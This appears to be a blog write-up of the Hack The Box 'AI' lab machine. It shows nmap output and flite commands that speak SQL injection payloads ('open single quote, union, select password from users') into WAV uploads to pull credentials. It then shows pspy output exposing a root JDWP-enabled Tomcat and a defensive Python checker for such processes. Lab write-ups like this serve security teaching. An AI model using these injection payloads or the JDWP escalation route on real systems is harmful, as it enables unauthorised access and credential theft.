Hey guys. AI from Hack The Box was retired today and here is my write-up about it.
AI is a medium-difficulty Linux machine and its IP address is 10.10.10.163. It is a really fun machine.
The user path involves uploading a WAV file to the web server, using SQL injection to pull credentials from the database, and logging in over SSH.
For privilege escalation, Tomcat is running as root with the Java Debug Wire Protocol (JDWP) enabled, and we exploit that. So let's jump in.
As always, we start with nmap to scan for open ports and services.
root@ch4n:~# nmap -sC -sV 10.10.10.163
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-25 21:25 EST
Nmap scan report for 10.10.10.163
Host is up (0.25s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| 2048 6d:16:f4:32:eb:46:ca:37:04:d2:a5:aa:74:ed:ab:fc (RSA)
| 256 78:29:78:d9:f5:43:d1:cf:a0:03:55:b1:da:9e:51:b6 (ECDSA)
|_ 256 85:2e:7d:66:30:a6:6e:30:04:82:c1:ae:ba:a4:99:bd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Hello AI!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.42 seconds
In our nmap scan there are two open ports. SSH is running on port 22 and HTTP is running on port 80.
Nothing else was interesting in the nmap output, so let's check the web page.
After playing around on the web page I found ai.php.
It says to drop your query using a WAV file.
So here we need to upload a WAV file.
I want to explain something about converting text to a WAV file here.
At first I used an online tool, https://www.text2speech.org/, but it does not work for long sentences.
The AI can't understand them, so I split the audio in Audacity for the long sentences, which is annoying to do.
So I looked for a better tool and found flite.
The web page mentions a query, so I thought it might be voice SQL injection. Actually I didn't expect that, but it was really fun.
So I tested with:
open single quote
Turn it into a WAV file:
flite -o open-single-quote.wav -t "open single quote" -voice rms
Here we get the SQL injection error.
Let's pull the creds :-)
I used some commas and spaces to make it speak slowly.
root@ch4n:~/Desktop/htb/boxes/AI# flite -o user.wav -t "open single quote, union, select, username, from, users, comment, database" -voice rms
Here we got the username as
Do the same thing for the password:-)
root@ch4n:~/Desktop/htb/boxes/AI# flite -o pass.wav -t "open single quote, union, select, password, from, users, comment, database" -voice rms
Here we got the password as
I just logged in over SSH and grabbed the user flag.
I just ran pspy and found the Java debug process running:
2019/11/10 17:52:03 CMD: UID=0 PID=14442 | /usr/bin/java -Djava.util.logging.config.file=/opt/apache-tomcat-9.0.27/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -agentlib:jdwp=transport=dt_socket,address=localhost:8000,server=y,suspend=n -Dignore.endorsed.dirs= -classpath /opt/apache-tomcat-9.0.27/bin/bootstrap.jar:/opt/apache-tomcat-9.0.27/bin/tomcat-juli.jar -Dcatalina.base=/opt/apache-tomcat-9.0.27 -Dcatalina.home=/opt/apache-tomcat-9.0.27 -Djava.io.tmpdir=/opt/apache-tomcat-9.0.27/temp org.apache.catalina.startup.Bootstrap start
2019/11/10 17:52:07 CMD: UID=1000 PID=14465 | sudo -u mrr3boot vi ./var/crash/_usr_bin_pkttyagent.4000000000.crash
2019/11/10 17:52:07 CMD: UID=4000000000 PID=14466 | vi ./var/crash/_usr_bin_pkttyagent.4000000000.crash
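The pspy line above is exactly what a defender should be looking for on a host: a JVM started with a JDWP agent (`-agentlib:jdwp=...,server=y`), and here running as UID 0. The following checker is an added example written for this write-up, not part of the original post or of pspy; it assumes pspy's `CMD: UID=... PID=... | <command>` line format as shown above, uses the real Tomcat line from the box as its first sample, and adds two constructed lines for comparison. The function names are my own.

```python
import re
# Sample pspy output. The first line is the Tomcat process captured in this
# write-up; the other two are constructed here for comparison.
SAMPLE_LINES = [
    "2019/11/10 17:52:03 CMD: UID=0 PID=14442 | /usr/bin/java -agentlib:jdwp="
    "transport=dt_socket,address=localhost:8000,server=y,suspend=n -classpath "
    "/opt/apache-tomcat-9.0.27/bin/bootstrap.jar org.apache.catalina.startup.Bootstrap start",
    "2019/11/10 17:53:10 CMD: UID=1000 PID=14500 | /usr/bin/java "
    "-agentlib:jdwp=transport=dt_socket,address=*:5005,server=y,suspend=n -jar app.jar",
    "2019/11/10 17:53:11 CMD: UID=1000 PID=14501 | /usr/bin/java -jar app.jar",
]

PSPY_RE = re.compile(r"UID=(\d+)\s+PID=(\d+)\s+\|\s+(.*)$")
# Matches both the modern -agentlib:jdwp= form and the legacy -Xrunjdwp: form.
JDWP_RE = re.compile(r"-agentlib:jdwp=(\S+)|-Xrunjdwp:(\S+)")

def parse_jdwp_options(cmdline):
    """Return the JDWP agent's key=value options as a dict, or None if absent."""
    m = JDWP_RE.search(cmdline)
    if not m:
        return None
    opts = {}
    for item in (m.group(1) or m.group(2)).split(","):
        key, _, value = item.partition("=")
        opts[key] = value
    return opts

def assess_line(line):
    """Assess one pspy line; None if it is not a JVM with a JDWP agent."""
    m = PSPY_RE.search(line)
    if not m:
        return None
    uid, pid, cmdline = int(m.group(1)), int(m.group(2)), m.group(3)
    opts = parse_jdwp_options(cmdline)
    if opts is None:
        return None
    host, _, port = opts.get("address", "").rpartition(":")
    findings = []
    if opts.get("server") == "y":
        findings.append("debugger socket is listening (server=y)")
    # A bare port (no host) binds all interfaces on JDK 8 and earlier; JDK 9+ defaults to loopback.
    if host in ("", "*", "0.0.0.0", "::"):
        findings.append("bound to all interfaces")
    if uid == 0:
        findings.append("JVM runs as root")
    return {"pid": pid, "uid": uid, "port": port, "findings": findings}

def audit(lines):
    return [r for r in map(assess_line, lines) if r is not None]
```

On this box the agent is bound to localhost, so the finding is not remote exposure but the combination of a listening debugger with a root-owned JVM that any local user can reach.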
After googling for a JDWP exploit, I found the exploit and a wonderful article.
After reading the exploit, I ran it and grabbed the root flag.
That’s it guys.
Hope you enjoyed my write-up :-)
Don't forget to check out the other write-ups on my blog.